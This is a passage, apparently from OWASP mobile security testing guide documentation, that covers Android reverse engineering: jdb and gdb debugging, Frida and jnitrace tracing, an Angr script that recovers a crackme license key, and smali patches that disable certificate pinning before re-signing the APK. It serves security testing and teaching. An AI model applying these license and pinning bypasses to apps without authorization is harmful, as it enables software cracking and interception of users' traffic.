Our objective is to set a breakpoint at the first instruction of the native function Java_sg_vantagepoint_helloworldjni_MainActivity_stringFromJNI
before resuming the app. Unfortunately, this isn't possible at this point in the execution because libnative-lib.so
isn't yet mapped into process memory, it's loaded dynamically during runtime. To get this working, you'll first use jdb to gently change the process into the desired state.
First, resume execution of the Java VM by attaching jdb. You don't want the process to resume immediately though, so pipe the suspend
command into jdb:
$ adb jdwp\n14342\n$ adb forward tcp:7777 jdwp:14342\n$ { echo \"suspend\"; cat; } | jdb -attach localhost:7777\n
Next, suspend the process where the Java runtime loads libnative-lib.so
. In jdb, set a breakpoint at the java.lang.System.loadLibrary
method and resume the process. After the breakpoint has been reached, execute the step up
command, which will resume the process until loadLibrary
returns. At this point, libnative-lib.so
has been loaded.
> stop in java.lang.System.loadLibrary\n> resume\nAll threads resumed.\nBreakpoint hit: \"thread=main\", java.lang.System.loadLibrary(), line=988 bci=0\n> step up\nmain[1] step up\n>\nStep completed: \"thread=main\", sg.vantagepoint.helloworldjni.MainActivity.<clinit>(), line=12 bci=5\n\nmain[1]\n
Execute gdbserver
to attach to the suspended app. This will cause the app to be suspended by both the Java VM and the Linux kernel (creating a state of \"double-suspension\").
$ adb forward tcp:1234 tcp:1234\n$ $TOOLCHAIN/arm-linux-androideabi-gdb libnative-lib.so\nGNU gdb (GDB) 7.7\nCopyright (C) 2014 Free Software Foundation, Inc.\n(...)\n(gdb) target remote :1234\nRemote debugging using :1234\n0xb6de83b8 in ?? ()\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0032/","title":"Execution Tracing","text":"Besides being useful for debugging, the jdb command line tool offers basic execution tracing functionality. To trace an app right from the start, you can pause the app with the Android \"Wait for Debugger\" feature or a kill -STOP
command and attach jdb to set a deferred method breakpoint on any initialization method. Once the breakpoint is reached, activate method tracing with the trace go methods
command and resume execution. jdb will dump all method entries and exits from that point onwards.
$ adb forward tcp:7777 jdwp:7288\n$ { echo \"suspend\"; cat; } | jdb -attach localhost:7777\nSet uncaught java.lang.Throwable\nSet deferred uncaught java.lang.Throwable\nInitializing jdb ...\n> All threads suspended.\n> stop in com.acme.bob.mobile.android.core.BobMobileApplication.<clinit>()\nDeferring breakpoint com.acme.bob.mobile.android.core.BobMobileApplication.<clinit>().\nIt will be set after the class is loaded.\n> resume\nAll threads resumed.M\nSet deferred breakpoint com.acme.bob.mobile.android.core.BobMobileApplication.<clinit>()\n\nBreakpoint hit: \"thread=main\", com.acme.bob.mobile.android.core.BobMobileApplication.<clinit>(), line=44 bci=0\nmain[1] trace go methods\nmain[1] resume\nMethod entered: All threads resumed.\n
The Dalvik Debug Monitor Server (DDMS) is a GUI tool included with Android Studio. It may not look like much, but its Java method tracer is one of the most awesome tools you can have in your arsenal, and it is indispensable for analyzing obfuscated bytecode.
DDMS is somewhat confusing, however; it can be launched several ways, and different trace viewers will be launched depending on how a method was traced. There's a standalone tool called \"Traceview\" as well as a built-in viewer in Android Studio, both of which offer different ways to navigate the trace. You'll usually use Android studio's built-in viewer, which gives you a zoomable hierarchical timeline of all method calls. However, the standalone tool is also useful, it has a profile panel that shows the time spent in each method along with the parents and children of each method.
To record an execution trace in Android Studio, open the Android tab at the bottom of the GUI. Select the target process in the list and click the little stop watch button on the left. This starts the recording. Once you're done, click the same button to stop the recording. The integrated trace view will open and show the recorded trace. You can scroll and zoom the timeline view with the mouse or trackpad.
Execution traces can also be recorded in the standalone Android Device Monitor. The Device Monitor can be started within Android Studio (Tools -> Android -> Android Device Monitor) or from the shell with the ddms
command.
To start recording tracing information, select the target process in the Devices tab and click Start Method Profiling. Click the stop button to stop recording, after which the Traceview tool will open and show the recorded trace. Clicking any of the methods in the profile panel highlights the selected method in the timeline panel.
DDMS also offers a convenient heap dump button that will dump the Java heap of a process to a .hprof file. The Android Studio user guide contains more information about Traceview.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0032/#tracing-system-calls","title":"Tracing System Calls","text":"Moving down a level in the OS hierarchy, you arrive at privileged functions that require the powers of the Linux kernel. These functions are available to normal processes via the system call interface. Instrumenting and intercepting calls into the kernel is an effective method for getting a rough idea of what a user process is doing, and often the most efficient way to deactivate low-level tampering defenses.
Strace is a standard Linux utility that is not included with Android by default, but can be easily built from source via the Android NDK. It monitors the interaction between processes and the kernel, being a very convenient way to monitor system calls. However, there's a downside: as strace depends on the ptrace
system call to attach to the target process, once anti-debugging measures become active it will stop working.
If the \"Wait for debugger\" feature in Settings > Developer options is unavailable, you can use a shell script to launch the process and immediately attach strace (not an elegant solution, but it works):
while true; do pid=$(pgrep 'target_process' | head -1); if [[ -n \"$pid\" ]]; then strace -s 2000 - e \"!read\" -ff -p \"$pid\"; break; fi; done\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0032/#ftrace","title":"Ftrace","text":"Ftrace is a tracing utility built directly into the Linux kernel. On a rooted device, ftrace can trace kernel system calls more transparently than strace can (strace relies on the ptrace system call to attach to the target process).
Conveniently, the stock Android kernel on both Lollipop and Marshmallow include ftrace functionality. The feature can be enabled with the following command:
echo 1 > /proc/sys/kernel/ftrace_enabled\n
The /sys/kernel/debug/tracing
directory holds all control and output files related to ftrace. The following files are found in this directory:
The KProbes interface provides an even more powerful way to instrument the kernel: it allows you to insert probes into (almost) arbitrary code addresses within kernel memory. KProbes inserts a breakpoint instruction at the specified address. Once the breakpoint is reached, control passes to the KProbes system, which then executes the user-defined handler function(s) and the original instruction. Besides being great for function tracing, KProbes can implement rootkit-like functionality, such as file hiding.
Jprobes and Kretprobes are other KProbes-based probe types that allow hooking of function entries and exits.
The stock Android kernel comes without loadable module support, which is a problem because Kprobes are usually deployed as kernel modules. The strict memory protection the Android kernel is compiled with is another issue because it prevents the patching of some parts of Kernel memory. Elfmaster's system call hooking method causes a Kernel panic on stock Lollipop and Marshmallow because the sys_call_table is non-writable. You can, however, use KProbes in a sandbox by compiling your own, more lenient Kernel (more on this later).
"},{"location":"MASTG/techniques/android/MASTG-TECH-0033/","title":"Method Tracing","text":"In contrast to method profiling, which tells you how frequently a method is being called, method tracing helps you to also determine its input and output values. This technique can prove to be very useful when dealing with applications that have a big codebase and/or are obfuscated.
If you prefer a GUI-based approach you can use tools such as RMS - Runtime Mobile Security which enables a more visual experience as well as include several convenience tracing options.
If you prefer the command line, Frida offers a useful syntax to query Java classes and methods as well as Java method tracing support for frida-trace via -j
(starting on frida-tools 8.0, Frida 12.10).
Java.enumerateMethods('*youtube*!on*')
uses globs to take all classes that include \"youtube\" as part of their name and enumerate all methods starting with \"on\".-j '*!*certificate*/isu'
triggers a case-insensitive query (i
), including method signatures (s
) and excluding system classes (u
).Refer to the Release Notes for Frida 12.10 for more details on this new feature. To learn more about all options for advanced usage, check the documentation on the official Frida website.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0034/","title":"Native Code Tracing","text":"Native methods tracing can be performed with relative ease compared to Java method tracing. frida-trace
is a CLI tool for dynamically tracing function calls. It makes tracing native functions trivial and can be very useful for collecting information about an application.
In order to use frida-trace
, a Frida server should be running on the device. An example for tracing libc's open
function using frida-trace
is demonstrated below, where -U
connects to the USB device and -i
specifies the function to be included in the trace.
frida-trace -U -i \"open\" com.android.chrome\n
Note how, by default, only the arguments passed to the function are shown, but not the return values. Under the hood, frida-trace
generates one little JavaScript handler file per matched function in the auto-generated __handlers__
folder, which Frida then injects into the process. You can edit these files for more advanced usage such as obtaining the return value of the functions, their input parameters, accessing the memory, etc. Check Frida's JavaScript API for more details.
In this case, the generated script which traces all calls to the open
function in libc.so
is located in __handlers__/libc.so/open.js
, it looks as follows:
{\n onEnter: function (log, args, state) {\n log('open(' +\n 'path=\"' + args[0].readUtf8String() + '\"' +\n ', oflag=' + args[1] +\n ')');\n },\n\n\n onLeave: function (log, retval, state) {\n log('\\t return: ' + retval); \\\\ edited\n }\n}\n
In the above script, onEnter
takes care of logging the calls to this function and its two input parameters in the right format. You can edit the onLeave
event to print the return values as shown above.
Note that libc is a well-known library, Frida is able to derive the input parameters of its open
function and automatically log them correctly. But this won't be the case for other libraries or for Android Kotlin/Java code. In that case, you may want to obtain the signatures of the functions you're interested in by referring to Android Developers documentation or by reverse engineer the app first.
Another thing to notice in the output above is that it's colorized. An application can have multiple threads running, and each thread can call the open
function independently. By using such a color scheme, the output can be easily visually segregated for each thread.
frida-trace
is a very versatile tool and there are multiple configuration options available such as:
-I
and excluding -X
entire modules.-i \"Java_*\"
(note the use of a glob *
to match all possible functions starting with \"Java_\").-a \"libjpeg.so!0x4793c\"
.frida-trace -U -i \"Java_*\" com.android.chrome\n
Many binaries are stripped and don't have function name symbols available with them. In such cases, a function can be traced using its address as well.
frida-trace -p 1372 -a \"libjpeg.so!0x4793c\"\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0035/","title":"JNI Tracing","text":"As detailed in section Reviewing Disassembled Native Code, the first argument passed to every JNI function is a JNI interface pointer. This pointer contains a table of functions that allows native code to access the Android Runtime. Identifying calls to these functions can help with understanding library functionality, such as what strings are created or Java methods are called.
jnitrace is a Frida based tool similar to frida-trace which specifically targets the usage of Android's JNI API by native libraries, providing a convenient way to obtain JNI method traces including arguments and return values.
You can easily install it by running pip install jnitrace
and run it straight away as follows:
jnitrace -l libnative-lib.so sg.vantagepoint.helloworldjni\n
The -l
option can be provided multiple times to trace multiple libraries, or *
can be provided to trace all libraries. This, however, may provide a lot of output.
In the output you can see the trace of a call to NewStringUTF
made from the native code (its return value is then given back to Java code, see section \"Reviewing Disassembled Native Code\" for more details). Note how similarly to frida-trace, the output is colorized helping to visually distinguish the different threads.
When tracing JNI API calls you can see the thread ID at the top, followed by the JNI method call including the method name, the input arguments and the return value. In the case of a call to a Java method from native code, the Java method arguments will also be supplied. Finally jnitrace will attempt to use the Frida backtracing library to show where the JNI call was made from.
To learn more about all options for advanced usage, check the documentation on the jnitrace GitHub page.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0036/","title":"Emulation-based Analysis","text":"The Android emulator is based on QEMU, a generic and open source machine emulator. QEMU emulates a guest CPU by translating the guest instructions on-the-fly into instructions the host processor can understand. Each basic block of guest instructions is disassembled and translated into an intermediate representation called Tiny Code Generator (TCG). The TCG block is compiled into a block of host instructions, stored in a code cache, and executed. After execution of the basic block, QEMU repeats the process for the next block of guest instructions (or loads the already translated block from the cache). The whole process is called dynamic binary translation.
Because the Android emulator is a fork of QEMU, it comes with all QEMU features, including monitoring, debugging, and tracing facilities. QEMU-specific parameters can be passed to the emulator with the -qemu
command line flag. You can use QEMU's built-in tracing facilities to log executed instructions and virtual register values. Starting QEMU with the -d
command line flag will cause it to dump the blocks of guest code, micro operations, or host instructions being executed. With the -d_asm
flag, QEMU logs all basic blocks of guest code as they enter QEMU's translation function. The following command logs all translated blocks to a file:
emulator -show-kernel -avd Nexus_4_API_19 -snapshot default-boot -no-snapshot-save -qemu -d in_asm,cpu 2>/tmp/qemu.log\n
Unfortunately, generating a complete guest instruction trace with QEMU is impossible because code blocks are written to the log only at the time they are translated, not when they're taken from the cache. For example, if a block is repeatedly executed in a loop, only the first iteration will be printed to the log. There's no way to disable TB caching in QEMU (besides hacking the source code). Nevertheless, the functionality is sufficient for basic tasks, such as reconstructing the disassembly of a natively executed cryptographic algorithm.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0037/","title":"Symbolic Execution","text":"Symbolic execution is a very useful technique to have in your toolbox, especially while dealing with problems where you need to find a correct input for reaching a certain block of code. In this section, we will solve a simple Android crackme by using the Angr binary analysis framework as our symbolic execution engine.
To demonstrate this technique we'll use a crackme called Android License Validator. The crackme consists of a single ELF executable file, which can be executed on any Android device by following the instructions below:
$ adb push validate /data/local/tmp\n[100%] /data/local/tmp/validate\n\n$ adb shell chmod 755 /data/local/tmp/validate\n\n$ adb shell /data/local/tmp/validate\nUsage: ./validate <serial>\n\n$ adb shell /data/local/tmp/validate 12345\nIncorrect serial (wrong format).\n
So far so good, but we know nothing about what a valid license key looks like. To get started, open the ELF executable in a disassembler such as iaito. The main function is located at offset 0x00001874
in the disassembly. It is important to note that this binary is PIE-enabled, and iaito chooses to load the binary at 0x0
as image base address.
The function names have been stripped from the binary, but luckily there are enough debugging strings to provide us a context to the code. Moving forward, we will start analyzing the binary from the entry function at offset 0x00001874
, and keep a note of all the information easily available to us. During this analysis, we will also try to identify the code regions which are suitable for symbolic execution.
strlen
is called at offset 0x000018a8
, and the returned value is compared to 0x10 at offset 0x000018b0
. Immediately after that, the input string is passed to a Base32 decoding function at offset 0x00001340
. This provides us with valuable information that the input license key is a Base32-encoded 16-character string (which totals 10 bytes in raw). The decoded input is then passed to the function at offset 0x00001760
, which validates the license key. The disassembly of this function is shown below.
We can now use this information about the expected input to further look into the validation function at 0x00001760
.
\u256d (fcn) fcn.00001760 268\n\u2502 fcn.00001760 (int32_t arg1);\n\u2502 ; var int32_t var_20h @ fp-0x20\n\u2502 ; var int32_t var_14h @ fp-0x14\n\u2502 ; var int32_t var_10h @ fp-0x10\n\u2502 ; arg int32_t arg1 @ r0\n\u2502 ; CALL XREF from fcn.00001760 (+0x1c4)\n\u2502 0x00001760 push {r4, fp, lr}\n\u2502 0x00001764 add fp, sp, 8\n\u2502 0x00001768 sub sp, sp, 0x1c\n\u2502 0x0000176c str r0, [var_20h] ; 0x20 ; \"$!\" ; arg1\n\u2502 0x00001770 ldr r3, [var_20h] ; 0x20 ; \"$!\" ; entry.preinit0\n\u2502 0x00001774 str r3, [var_10h] ; str.\n\u2502 ; 0x10\n\u2502 0x00001778 mov r3, 0\n\u2502 0x0000177c str r3, [var_14h] ; 0x14\n\u2502 \u256d\u2500< 0x00001780 b 0x17d0\n\u2502 \u2502 ; CODE XREF from fcn.00001760 (0x17d8)\n\u2502 \u256d\u2500\u2500> 0x00001784 ldr r3, [var_10h] ; str.\n\u2502 \u2502 ; 0x10 ; entry.preinit0\n\u2502 \u254e\u2502 0x00001788 ldrb r2, [r3]\n\u2502 \u254e\u2502 0x0000178c ldr r3, [var_10h] ; str.\n\u2502 \u254e\u2502 ; 0x10 ; entry.preinit0\n\u2502 \u254e\u2502 0x00001790 add r3, r3, 1\n\u2502 \u254e\u2502 0x00001794 ldrb r3, [r3]\n\u2502 \u254e\u2502 0x00001798 eor r3, r2, r3\n\u2502 \u254e\u2502 0x0000179c and r2, r3, 0xff\n\u2502 \u254e\u2502 0x000017a0 mvn r3, 0xf\n\u2502 \u254e\u2502 0x000017a4 ldr r1, [var_14h] ; 0x14 ; entry.preinit0\n\u2502 \u254e\u2502 0x000017a8 sub r0, fp, 0xc\n\u2502 \u254e\u2502 0x000017ac add r1, r0, r1\n\u2502 \u254e\u2502 0x000017b0 add r3, r1, r3\n\u2502 \u254e\u2502 0x000017b4 strb r2, [r3]\n\u2502 \u254e\u2502 0x000017b8 ldr r3, [var_10h] ; str.\n\u2502 \u254e\u2502 ; 0x10 ; entry.preinit0\n\u2502 \u254e\u2502 0x000017bc add r3, r3, 2 ; \"ELF\\x01\\x01\\x01\" ; aav.0x00000001\n\u2502 \u254e\u2502 0x000017c0 str r3, [var_10h] ; str.\n\u2502 \u254e\u2502 ; 0x10\n\u2502 \u254e\u2502 0x000017c4 ldr r3, [var_14h] ; 0x14 ; entry.preinit0\n\u2502 \u254e\u2502 0x000017c8 add r3, r3, 1\n\u2502 \u254e\u2502 0x000017cc str r3, [var_14h] ; 0x14\n\u2502 \u254e\u2502 ; CODE XREF from fcn.00001760 (0x1780)\n\u2502 \u254e\u2570\u2500> 0x000017d0 ldr r3, [var_14h] ; 0x14 ; entry.preinit0\n\u2502 \u254e 0x000017d4 cmp r3, 4 ; aav.0x00000004 ; aav.0x00000001 ; aav.0x00000001\n\u2502 \u2570\u2500\u2500< 0x000017d8 ble 0x1784 ; likely\n\u2502 0x000017dc ldrb r4, [fp, -0x1c] ; \"4\"\n\u2502 0x000017e0 bl fcn.000016f0\n\u2502 0x000017e4 mov r3, r0\n\u2502 0x000017e8 cmp r4, r3\n\u2502 \u256d\u2500< 0x000017ec bne 0x1854 ; likely\n\u2502 \u2502 0x000017f0 ldrb r4, [fp, -0x1b]\n\u2502 \u2502 0x000017f4 bl fcn.0000170c\n\u2502 \u2502 0x000017f8 mov r3, r0\n\u2502 \u2502 0x000017fc cmp r4, r3\n\u2502 \u256d\u2500\u2500< 0x00001800 bne 0x1854 ; likely\n\u2502 \u2502\u2502 0x00001804 ldrb r4, [fp, -0x1a]\n\u2502 \u2502\u2502 0x00001808 bl fcn.000016f0\n\u2502 \u2502\u2502 0x0000180c mov r3, r0\n\u2502 \u2502\u2502 0x00001810 cmp r4, r3\n\u2502 \u256d\u2500\u2500\u2500< 0x00001814 bne 0x1854 ; likely\n\u2502 \u2502\u2502\u2502 0x00001818 ldrb r4, [fp, -0x19]\n\u2502 \u2502\u2502\u2502 0x0000181c bl fcn.00001728\n\u2502 \u2502\u2502\u2502 0x00001820 mov r3, r0\n\u2502 \u2502\u2502\u2502 0x00001824 cmp r4, r3\n\u2502 \u256d\u2500\u2500\u2500\u2500< 0x00001828 bne 0x1854 ; likely\n\u2502 \u2502\u2502\u2502\u2502 0x0000182c ldrb r4, [fp, -0x18]\n\u2502 \u2502\u2502\u2502\u2502 0x00001830 bl fcn.00001744\n\u2502 \u2502\u2502\u2502\u2502 0x00001834 mov r3, r0\n\u2502 \u2502\u2502\u2502\u2502 0x00001838 cmp r4, r3\n\u2502 \u256d\u2500\u2500\u2500\u2500\u2500< 0x0000183c bne 0x1854 ; likely\n\u2502 \u2502\u2502\u2502\u2502\u2502 0x00001840 ldr r3, [0x0000186c] ; [0x186c:4]=0x270 section..hash ; section..hash\n\u2502 \u2502\u2502\u2502\u2502\u2502 0x00001844 add r3, pc, r3 ; 0x1abc ; \"Product activation passed. Congratulations!\"\n\u2502 \u2502\u2502\u2502\u2502\u2502 0x00001848 mov r0, r3 ; 0x1abc ; \"Product activation passed. Congratulations!\" ;\n\u2502 \u2502\u2502\u2502\u2502\u2502 0x0000184c bl sym.imp.puts ; int puts(const char *s)\n\u2502 \u2502\u2502\u2502\u2502\u2502 ; int puts(\"Product activation passed. Congratulations!\")\n\u2502 \u256d\u2500\u2500\u2500\u2500\u2500\u2500< 0x00001850 b 0x1864\n\u2502 \u2502\u2502\u2502\u2502\u2502\u2502 ; CODE XREFS from fcn.00001760 (0x17ec, 0x1800, 0x1814, 0x1828, 0x183c)\n\u2502 \u2502\u2570\u2570\u2570\u2570\u2570\u2500> 0x00001854 ldr r3, aav.0x00000288 ; [0x1870:4]=0x288 aav.0x00000288\n\u2502 \u2502 0x00001858 add r3, pc, r3 ; 0x1ae8 ; \"Incorrect serial.\" ;\n\u2502 \u2502 0x0000185c mov r0, r3 ; 0x1ae8 ; \"Incorrect serial.\" ;\n\u2502 \u2502 0x00001860 bl sym.imp.puts ; int puts(const char *s)\n\u2502 \u2502 ; int puts(\"Incorrect serial.\")\n\u2502 \u2502 ; CODE XREF from fcn.00001760 (0x1850)\n\u2502 \u2570\u2500\u2500\u2500\u2500\u2500\u2500> 0x00001864 sub sp, fp, 8\n\u2570 0x00001868 pop {r4, fp, pc} ; entry.preinit0 ; entry.preinit0 ;\n
Discussing all the instructions in the function is beyond the scope of this chapter, instead we will discuss only the important points needed for the analysis. In the validation function, there is a loop present at 0x00001784
which performs a XOR operation at offset 0x00001798
. The loop is more clearly visible in the graph view below.
XOR is a very commonly used technique to encrypt information where obfuscation is the goal rather than security. XOR should not be used for any serious encryption, as it can be cracked using frequency analysis. Therefore, the mere presence of XOR encryption in such a validation logic always requires special attention and analysis.
Moving forward, at offset 0x000017dc
, the XOR decoded value obtained from above is being compared against the return value from a sub-function call at 0x000017e8
.
Clearly this function is not complex, and can be analyzed manually, but still remains a cumbersome task. Especially while working on a big code base, time can be a major constraint, and it is desirable to automate such analysis. Dynamic symbolic execution is helpful in exactly those situations. In the above crackme, the symbolic execution engine can determine the constraints on each byte of the input string by mapping a path between the first instruction of the license check (at 0x00001760
) and the code that prints the \"Product activation passed\" message (at 0x00001840
).
The constraints obtained from the above steps are passed to a solver engine, which finds an input that satisfies them - a valid license key.
You need to perform several steps to initialize Angr's symbolic execution engine:
Load the binary into a Project
, which is the starting point for any kind of analysis in Angr.
Pass the address from which the analysis should start. In this case, we will initialize the state with the first instruction of the serial validation function. This makes the problem significantly easier to solve because you avoid symbolically executing the Base32 implementation.
Pass the address of the code block that the analysis should reach. In this case, that's the offset 0x00001840
, where the code responsible for printing the \"Product activation passed\" message is located.
Also, specify the addresses that the analysis should not reach. In this case, the code block that prints the \"Incorrect serial\" message at 0x00001854
is not interesting.
Note that the Angr loader will load the PIE executable with a base address of 0x400000
, which needs to be added to the offsets from iaito before passing it to Angr.
The final solution script is presented below:
import angr # Version: 9.2.2\nimport base64\n\nload_options = {}\n\nb = angr.Project(\"./validate\", load_options = load_options)\n# The key validation function starts at 0x401760, so that's where we create the initial state.\n# This speeds things up a lot because we're bypassing the Base32-encoder.\n\noptions = {\n angr.options.SYMBOL_FILL_UNCONSTRAINED_MEMORY,\n angr.options.ZERO_FILL_UNCONSTRAINED_REGISTERS,\n}\n\nstate = b.factory.blank_state(addr=0x401760, add_options=options)\n\nsimgr = b.factory.simulation_manager(state)\nsimgr.explore(find=0x401840, avoid=0x401854)\n\n# 0x401840 = Product activation passed\n# 0x401854 = Incorrect serial\nfound = simgr.found[0]\n\n# Get the solution string from *(R11 - 0x20).\n\naddr = found.memory.load(found.regs.r11 - 0x20, 1, endness=\"Iend_LE\")\nconcrete_addr = found.solver.eval(addr)\nsolution = found.solver.eval(found.memory.load(concrete_addr,10), cast_to=bytes)\nprint(base64.b32encode(solution))\n
As discussed previously in the section \"Dynamic Binary Instrumentation\", the symbolic execution engine constructs a binary tree of the operations for the program input given and generates a mathematical equation for each possible path that might be taken. Internally, Angr explores all the paths between the two points specified by us, and passes the corresponding mathematical equations to the solver to return meaningful concrete results. We can access these solutions via simulation_manager.found
list, which contains all the possible paths explored by Angr which satisfies our specified search criteria.
Take a closer look at the latter part of the script where the final solution string is being retrieved. The address of the string is obtained from address r11 - 0x20
. This may appear magical at first, but a careful analysis of the function at 0x00001760
holds the clue, as it determines if the given input string is a valid license key or not. In the disassembly above, you can see how the input string to the function (in register R0) is stored into a local stack variable 0x0000176c str r0, [var_20h]
. Hence, we decided to use this value to retrieve the final solution in the script. Using found.solver.eval
you can ask the solver questions like \"given the output of this sequence of operations (the current state in found
), what must the input (at addr
) have been?\".
In ARMv7, R11 is called fp (function pointer), therefore R11 - 0x20
is equivalent to fp-0x20
: var int32_t var_20h @ fp-0x20
Next, the endness
parameter in the script specifies that the data is stored in \"little-endian\" fashion, which is the case for almost all of the Android devices.
Also, it may appear as if the script is simply reading the solution string from the memory of the script. However, it's reading it from the symbolic memory. Neither the string nor the pointer to the string actually exist. The solver ensures that the solution it provides is the same as if the program would be executed to that point.
Running this script should return the following output:
$ python3 solve.py\nWARNING | ... | cle.loader | The main binary is a position-independent executable. It is being loaded with a base address of 0x400000.\n\nb'JACE6ACIARNAAIIA'\n
Now you can run the validate binary in your Android device to verify the solution as indicated here.
You may obtain different solutions using the script, as there are multiple valid license keys possible.
To conclude, learning symbolic execution might look a bit intimidating at first, as it requires deep understanding and extensive practice. However, the effort is justified considering the valuable time it can save in contrast to analyzing complex disassembled instructions manually. Typically you'd use hybrid techniques, as in the above example, where we performed manual analysis of the disassembled code to provide the correct criteria to the symbolic execution engine. Please refer to the iOS chapter for more examples on Angr usage.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0038/","title":"Patching","text":"Making small changes to the Android Manifest or bytecode is often the quickest way to fix small annoyances that prevent you from testing or reverse engineering an app. On Android, two issues in particular happen regularly:
android:debuggable
flag is not set to \"true\"
in the Android Manifest.In most cases, both issues can be fixed by making minor changes to the app (aka. patching) and then re-signing and repackaging it. Apps that run additional integrity checks beyond default Android code-signing are an exception. In those cases, you have to patch the additional checks as well.
The first step is unpacking and disassembling the APK with apktool
:
apktool d target_apk.apk\n
Note: To save time, you may use the flag --no-src
if you only want to unpack the APK but not disassemble the code. For example, when you only want to modify the Android Manifest and repack immediately.
Certificate pinning is an issue for security testers who want to intercept HTTPS communication for legitimate reasons. Patching bytecode to deactivate SSL pinning can help with this. To demonstrate bypassing certificate pinning, we'll walk through an implementation in an example application.
Once you've unpacked and disassembled the APK, it's time to find the certificate pinning checks in the Smali source code. Searching the code for keywords such as \"X509TrustManager\" should point you in the right direction.
In our example, a search for \"X509TrustManager\" returns one class that implements a custom TrustManager. The derived class implements the methods checkClientTrusted
, checkServerTrusted
, and getAcceptedIssuers
.
To bypass the pinning check, add the return-void
opcode to the first line of each method. This opcode causes the checks to return immediately. With this modification, no certificate checks are performed, and the application accepts all certificates.
.method public checkServerTrusted([LJava/security/cert/X509Certificate;Ljava/lang/String;)V\n .locals 3\n .param p1, \"chain\" # [Ljava/security/cert/X509Certificate;\n .param p2, \"authType\" # Ljava/lang/String;\n\n .prologue\n return-void # <-- OUR INSERTED OPCODE!\n .line 102\n iget-object v1, p0, Lasdf/t$a;->a:Ljava/util/ArrayList;\n\n invoke-virtual {v1}, Ljava/util/ArrayList;->iterator()Ljava/util/Iterator;\n\n move-result-object v1\n\n :goto_0\n invoke-interface {v1}, Ljava/util/Iterator;->hasNext()Z\n
This modification will break the APK signature, so you'll also have to re-sign the altered APK archive after repackaging it.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0038/#patching-example-making-an-app-debuggable","title":"Patching Example: Making an App Debuggable","text":"Every debugger-enabled process runs an extra thread for handling JDWP protocol packets. This thread is started only for apps that have the android:debuggable=\"true\"
flag set in their manifest file's <application>
element. This is the typical configuration of Android devices shipped to end users.
When reverse engineering apps, you'll often have access to the target app's release build only. Release builds aren't meant to be debugged, that's the purpose of debug builds. If the system property ro.debuggable
is set to \"0\", Android disallows both JDWP and native debugging of release builds. Although this is easy to bypass, you're still likely to encounter limitations, such as a lack of line breakpoints. Nevertheless, even an imperfect debugger is still an invaluable tool, being able to inspect the runtime state of a program makes understanding the program a lot easier.
To convert a release build into a debuggable build, you need to modify a flag in the Android Manifest file (AndroidManifest.xml). Once you've unpacked the app (e.g. apktool d --no-src UnCrackable-Level1.apk
) and decoded the Android Manifest, add android:debuggable=\"true\"
to it using a text editor:
<application android:allowBackup=\"true\" android:debuggable=\"true\" android:icon=\"@drawable/ic_launcher\" android:label=\"@string/app_name\" android:name=\"com.xxx.xxx.xxx\" android:theme=\"@style/AppTheme\">\n
Even if we haven't altered the source code, this modification also breaks the APK signature, so you'll also have to re-sign the altered APK archive.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0038/#patching-react-native-applications","title":"Patching React Native applications","text":"If the React Native framework has been used for developing then the main application code is located in the file assets/index.android.bundle
. This file contains the JavaScript code. Most of the time, the JavaScript code in this file is minified. By using the tool JStillery a human readable version of the file can be retrieved, allowing code analysis. The CLI version of JStillery or the local server should be preferred instead of using the online version as otherwise source code is sent and disclosed to a 3rd party.
The following approach can be used in order to patch the JavaScript file:
apktool
tool.assets/index.android.bundle
into a temporary file.JStillery
to beautify and deobfuscate the content of the temporary file.assets/index.android.bundle
file.apktool
tool and sign it before installing it on the target device/emulator.You can easily repackage an app by doing the following:
cd UnCrackable-Level1\napktool b\nzipalign -v 4 dist/UnCrackable-Level1.apk ../UnCrackable-Repackaged.apk\n
Note that the Android Studio build tools directory must be in the path. It is located at [SDK-Path]/build-tools/[version]
. The zipalign
and apksigner
tools are in this directory.
Before re-signing, you first need a code-signing certificate. If you have built a project in Android Studio before, the IDE has already created a debug keystore and certificate in $HOME/.android/debug.keystore
. The default password for this KeyStore is \"android\" and the key is called \"androiddebugkey\".
The standard Java distribution includes keytool
for managing KeyStores and certificates. You can create your own signing certificate and key, then add it to the debug KeyStore:
keytool -genkey -v -keystore ~/.android/debug.keystore -alias signkey -keyalg RSA -keysize 2048 -validity 20000\n
After the certificate is available, you can re-sign the APK with it. Be sure that apksigner
is in the path and that you run it from the folder where your repackaged APK is located.
apksigner sign --ks ~/.android/debug.keystore --ks-key-alias signkey UnCrackable-Repackaged.apk\n
Note: If you experience JRE compatibility issues with apksigner
, you can use jarsigner
instead. When you do this, zipalign
must be called after signing.
jarsigner -verbose -keystore ~/.android/debug.keystore ../UnCrackable-Repackaged.apk signkey\nzipalign -v 4 dist/UnCrackable-Level1.apk ../UnCrackable-Repackaged.apk\n
Now you may reinstall the app:
adb install UnCrackable-Repackaged.apk\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0040/","title":"Waiting for the Debugger","text":"The UnCrackable App for Android Level 1 is not stupid: it notices that it has been run in debuggable mode and reacts by shutting down. A modal dialog is shown immediately, and the crackme terminates once you tap \"OK\".
Fortunately, Android's \"Developer options\" contain the useful \"Wait for Debugger\" feature, which allows you to automatically suspend an app during startup until a JDWP debugger connects. With this feature, you can connect the debugger before the detection mechanism runs, and trace, debug, and deactivate that mechanism. It's really an unfair advantage, but, on the other hand, reverse engineers never play fair!
In the Developer options, pick Uncrackable1
as the debugging application and activate the \"Wait for Debugger\" switch.
Note: Even with ro.debuggable
set to \"1\" in default.prop
, an app won't show up in the \"debug app\" list unless the android:debuggable
flag is set to \"true\"
in the Android Manifest.
In the previous section we learned about patching application code to assist in our analysis, but this approach has several limitations. For instance, you'd like to log everything that's being sent over the network without having to perform a MITM attack. For this you'd have to patch all possible calls to the network APIs, which can quickly become impractical when dealing with large applications. In addition, the fact that patching is unique to each application can also be considered a shortcoming, as this code cannot be easily reused.
Using library injection you can develop reusable libraries and inject them to different applications, effectively making them behave differently without having to modify their original source code. This is known as DLL injection on Windows (broadly used to modify and bypass anti-cheat mechanisms in games), LD_PRELOAD
on Linux and DYLD_INSERT_LIBRARIES
